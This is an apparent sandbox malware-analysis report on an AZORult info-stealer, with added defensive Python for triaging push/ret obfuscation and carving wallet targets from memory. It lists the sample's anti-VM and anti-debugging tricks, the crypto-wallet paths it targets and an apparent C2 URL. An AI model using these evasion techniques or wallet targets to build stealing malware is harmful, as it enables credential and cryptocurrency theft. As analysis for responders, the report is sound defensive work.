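Every push/ret pair listed above pushes an address exactly 8 bytes past its ret (0041A08Eh against a ret at 0041A086, 0040C164h against 0040C15C, and so on). A fixed offset like that is the signature of a compiler idiom rather than hand-placed control-flow obfuscation: a Delphi try/finally epilogue is "push @exit; cleanup; ret" followed by a 5-byte jmp @HandleFinally and a 2-byte short jmp, which puts @exit 1 + 5 + 2 = 8 bytes after the ret, and the CODE/DATA/BSS section names in the unpacked image under "Detected unpacking" point to the same toolchain. The Python below is an added example for this report, not Joe Sandbox or AZORult code. It parses the lines above, histograms the push-target minus ret-address delta, and lists the pairs an analyst should actually open in a disassembler. The line marked CONSTRUCTED is made up so there is a genuine redirect to flag; the 8-byte figure is the editor's reading of the epilogue and should be confirmed against the binary.

```python
"""Tell compiler-generated push/ret epilogues apart from push/ret
control-flow obfuscation, using the pairs listed in this report.

Added example for this report; not Joe Sandbox or AZORult code. REPORT_LINES
are copied from the listing above. CONSTRUCTED_LINE is made up so the code
has a real redirect to flag. COMPILER_DELTA is an assumption to verify.
"""
import re
from collections import Counter
from typing import List, Tuple

PAIR_RE = re.compile(
    r"0_2_(?P<func>[0-9A-Fa-f]{8}) push (?P<target>[0-9A-Fa-f]{8})h; "
    r"ret 0_2_(?P<ret>[0-9A-Fa-f]{8})"
)

# Delphi try/finally epilogue: "push @exit; <cleanup>; ret" is followed by
# "jmp @HandleFinally" (5 bytes) and a 2-byte short jmp, so @exit lands
# 1 + 5 + 2 = 8 bytes after the ret. (Assumption: verify against the binary.)
COMPILER_DELTA = 8

REPORT_LINES = [
    "0_2_0041A068 push 0041A08Eh; ret 0_2_0041A086",
    "0_2_0041A02C push 0041A05Ch; ret 0_2_0041A054",
    "0_2_0040E8D0 push 0040E905h; ret 0_2_0040E8FD",
    "0_2_0040B164 push 0040B190h; ret 0_2_0040B188",
    "0_2_0040C136 push 0040C164h; ret 0_2_0040C15C",
    "0_2_004171E8 push 00417214h; ret 0_2_0041720C",
    "0_2_00414A28 push 00414A84h; ret 0_2_00414A7C",
    "0_2_00404C1C push 00404C6Dh; ret 0_2_00404C65",
]
# CONSTRUCTED: pushes the address of the WinINet routine listed under
# Networking (0_2_00417D84) and "returns" into it, i.e. a disguised jmp.
CONSTRUCTED_LINE = "0_2_00401000 push 00417D84h; ret 0_2_00401005"

Pair = Tuple[int, int, int]  # (function start, pushed target, ret address)


def parse_pairs(lines: List[str]) -> List[Pair]:
    """Pull (function, target, ret) triples out of sandbox report lines."""
    pairs: List[Pair] = []
    for line in lines:
        m = PAIR_RE.search(line)
        if m:
            pairs.append((int(m["func"], 16), int(m["target"], 16), int(m["ret"], 16)))
    return pairs


def delta_histogram(pairs: List[Pair]) -> Counter:
    """How far past each ret the pushed address points."""
    return Counter(target - ret for _, target, ret in pairs)


def suspicious_pairs(lines: List[str]) -> List[Pair]:
    """Pairs whose target is not the fixed compiler offset: open these in a disassembler."""
    return [p for p in parse_pairs(lines) if p[1] - p[2] != COMPILER_DELTA]


def classify(lines: List[str]) -> str:
    """Overall verdict for a listing: compiler idiom, genuine redirects, or both."""
    pairs = parse_pairs(lines)
    if not pairs:
        return "no-pairs"
    deltas = set(delta_histogram(pairs))
    if deltas == {COMPILER_DELTA}:
        return "compiler-epilogue"
    if COMPILER_DELTA in deltas:
        return "mixed"
    return "push-ret-redirect"


if __name__ == "__main__":
    print(delta_histogram(parse_pairs(REPORT_LINES)), classify(REPORT_LINES))
    mixed = REPORT_LINES + [CONSTRUCTED_LINE]
    print(suspicious_pairs(mixed), classify(mixed))
```

The sandbox heuristic is still right to fire: push/ret is a common way to hide a jmp from linear disassembly. The delta check just separates the instances worth an analyst's time from the compiler's own frames, which is what the heading "call, push, ret" lumps together.
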
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_00417216

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_00417216

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe RDTSC instruction interceptor: First address: 00000000021222C8 second address: 00000000021222CC instructions:
  0x00000000 rdtsc
  0x00000002 mov edx, eax
  0x00000004 rdtsc
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe RDTSC instruction interceptor: First address: 00000000021222CC second address: 00000000021222CC instructions:
  0x00000000 rdtsc
  0x00000002 sub eax, edx
  0x00000004 jnbe 00007FBD94B9982Ch
  0x00000006 rdtsc
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00415E40 GetSystemInfo, 0_2_00415E40
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00413030 FindFirstFileW,FindNextFileW,FindClose, 0_2_00413030
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004119A8 FindFirstFileW,FindNextFileW,FindClose, 0_2_004119A8
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004119AC FindFirstFileW,FindNextFileW,FindClose, 0_2_004119AC
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00412D6C FindFirstFileW,FindNextFileW,FindClose, 0_2_00412D6C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0041160C FindFirstFileW,FindNextFileW,FindClose, 0_2_0041160C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 0_2_00413F58
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW@

Anti Debugging:

Contains functionality to read the PEB
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00407AF0 mov eax, dword ptr fs:[00000030h] 0_2_00407AF0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0046052B mov ebx, dword ptr fs:[00000030h] 0_2_0046052B
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00460000 mov eax, dword ptr fs:[00000030h] 0_2_00460000
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00460000 mov ebx, dword ptr fs:[00000030h] 0_2_00460000
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00460AFD mov eax, dword ptr fs:[00000030h] 0_2_00460AFD
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004606F5 mov eax, dword ptr fs:[00000030h] 0_2_004606F5
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004606F5 mov ecx, dword ptr fs:[00000030h] 0_2_004606F5
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004A0000 mov eax, dword ptr fs:[00000030h] 0_2_004A0000
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004A0000 mov ecx, dword ptr fs:[00000030h] 0_2_004A0000
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004A0408 mov eax, dword ptr fs:[00000030h] 0_2_004A0408
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_00417216

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: GetLocaleInfoA, 0_2_00404BA8
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00404C71 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId, 0_2_00404C71
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004065F0 GetUserNameW, 0_2_004065F0

Stealing of Sensitive Information:

Yara detected Azorult
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Detected AZORult Info Stealer
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004186C4 0_2_004186C4
Yara detected Azorult Info Stealer
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: electrum.dat
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %appdata%\Electrum\wallets\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %APPDATA%\Exodus\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %APPDATA%\Exodus\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %appdata%\Electrum-LTC\wallets\
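
The wallet paths listed above are the stealer's target list, and they tell a responder exactly which directories to audit on a compromised host (the CryptUnprotectData call under Cryptography adds DPAPI-protected browser credential stores to the same scope). The Python below is an added example for this report, not Joe Sandbox or AZORult code. It carves %APPDATA% target strings out of a memory dump, dedupes them, names the wallet families and resolves them to concrete paths for a named profile. The target strings in the sample dump are the ones listed above; the dump layout, the padding bytes and the user name are constructed, and the default C:\Users\<user>\AppData\Roaming location for %APPDATA% is an assumption (folder-redirected profiles differ).

```python
"""Carve the stealer's crypto-wallet targets out of a memory dump and turn
them into paths a responder can check on the victim host.

Added example for this report; not Joe Sandbox or AZORult code. The target
strings in SAMPLE_DUMP are the ones listed above; the dump layout, padding
bytes and user name are constructed. The default C:\\Users\\<user>\\AppData\\Roaming
location for %APPDATA% is an assumption (folder-redirected profiles differ).
"""
import re
from typing import List

# %APPDATA% (any case), a backslash, then printable ASCII up to the terminator.
TARGET_RE = re.compile(rb"%appdata%\\[ -~]+", re.IGNORECASE)

# CONSTRUCTED memory dump: NUL-terminated strings with junk in between,
# including the duplicate Jaxx entry the report shows twice.
SAMPLE_DUMP = b"\x00".join([
    b"\x90\x90\xed\x3e junk",
    b"electrum.dat",
    b"%appdata%\\Electrum\\wallets\\",
    b"%APPDATA%\\Jaxx\\Local Storage\\",
    b"%APPDATA%\\Exodus\\",
    b"%APPDATA%\\Jaxx\\Local Storage\\",
    b"%APPDATA%\\Ethereum\\keystore\\",
    b"%appdata%\\Electrum-LTC\\wallets\\",
    b"http://admin.svapofit.com/azs/index.php",
]) + b"\x00"


def extract_targets(dump: bytes) -> List[str]:
    """Unique %APPDATA% target paths in first-seen order, prefix case-normalised."""
    seen: List[str] = []
    for m in TARGET_RE.finditer(dump):
        path = "%APPDATA%" + m.group().decode("ascii")[len("%APPDATA%"):]
        if path not in seen:
            seen.append(path)
    return seen


def wallet_families(targets: List[str]) -> List[str]:
    """Application folder directly under %APPDATA% for each target."""
    return sorted({t.split("\\")[1] for t in targets})


def resolve_paths(targets: List[str], user: str) -> List[str]:
    """Expand %APPDATA% for one profile (default roaming location assumed)."""
    roaming = "C:\\Users\\" + user + "\\AppData\\Roaming"
    return [t.replace("%APPDATA%", roaming, 1) for t in targets]


if __name__ == "__main__":
    targets = extract_targets(SAMPLE_DUMP)
    print(wallet_families(targets))
    for p in resolve_paths(targets, "user"):
        print(p)
```

On a live incident the resolved paths feed the file-access timeline: any read of those directories by this process between execution and the check-in above is the exfiltrated set, and the wallet owners should be treated as compromised rather than merely exposed.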